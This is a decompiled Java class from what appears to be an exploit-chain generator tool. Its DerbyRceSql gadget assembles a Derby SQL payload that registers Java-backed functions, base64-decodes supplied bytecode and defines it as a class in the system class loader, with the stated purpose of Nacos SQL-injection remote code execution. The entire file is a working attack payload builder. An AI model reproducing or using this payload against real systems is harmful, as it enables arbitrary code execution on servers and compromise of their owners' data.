package com.ar3h.chains.gadget.impl.common.other;

import com.alibaba.druid.util.JdbcConstants;
import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import org.apache.commons.codec.binary.Base64;

@GadgetAnnotation(name = "Derby加载任意字节码", description = "适用于Nacos sql注入rce场景", dependencies = {JdbcConstants.DERBY})
@GadgetTags(tags = {Tag.Other}, nextTags = {Tag.BytecodeConvertTag})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/other/DerbyRceSql.class */
public class DerbyRceSql implements Gadget {
    public String bytecodeClassName;

    public String getObject(byte[] bArr) {
        return "create type typeClass external name 'java.lang.Class' language java\ncreate type typeClassLoader external name 'java.lang.ClassLoader' language java\ncreate function base64Decode(className VARCHAR(32672)) returns VARCHAR(32672) FOR BIT DATA external name 'org.springframework.util.Base64Utils.decodeFromString' language java parameter style java\ncreate function getSystemClassLoader() returns typeClassLoader external name 'java.lang.ClassLoader.getSystemClassLoader' language java parameter style java\ncreate function defineClass(className VARCHAR(32672),bytes VARCHAR(32672) FOR BIT DATA,loader typeClassLoader) returns typeClass external name 'org.springframework.cglib.core.ReflectUtils.defineClass(java.lang.String, byte[],java.lang.ClassLoader)' language java parameter style java\ncreate table test(v typeClass)\ninsert into test values (defineClass('" + this.bytecodeClassName + "',base64Decode('" + Base64.encodeBase64String(bArr) + "'),getSystemClassLoader()))\ndrop table test\ndrop function defineClass\ndrop function getSystemClassLoader\ndrop function base64Decode\ndrop type typeClassLoader RESTRICT\ndrop type typeClass RESTRICT";
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        byte[] bArr = (byte[]) gadgetChain.doCreate(gadgetContext);
        this.bytecodeClassName = gadgetContext.getString(ContextTag.CLASS_NAME_KEY);
        return getObject(bArr);
    }
}
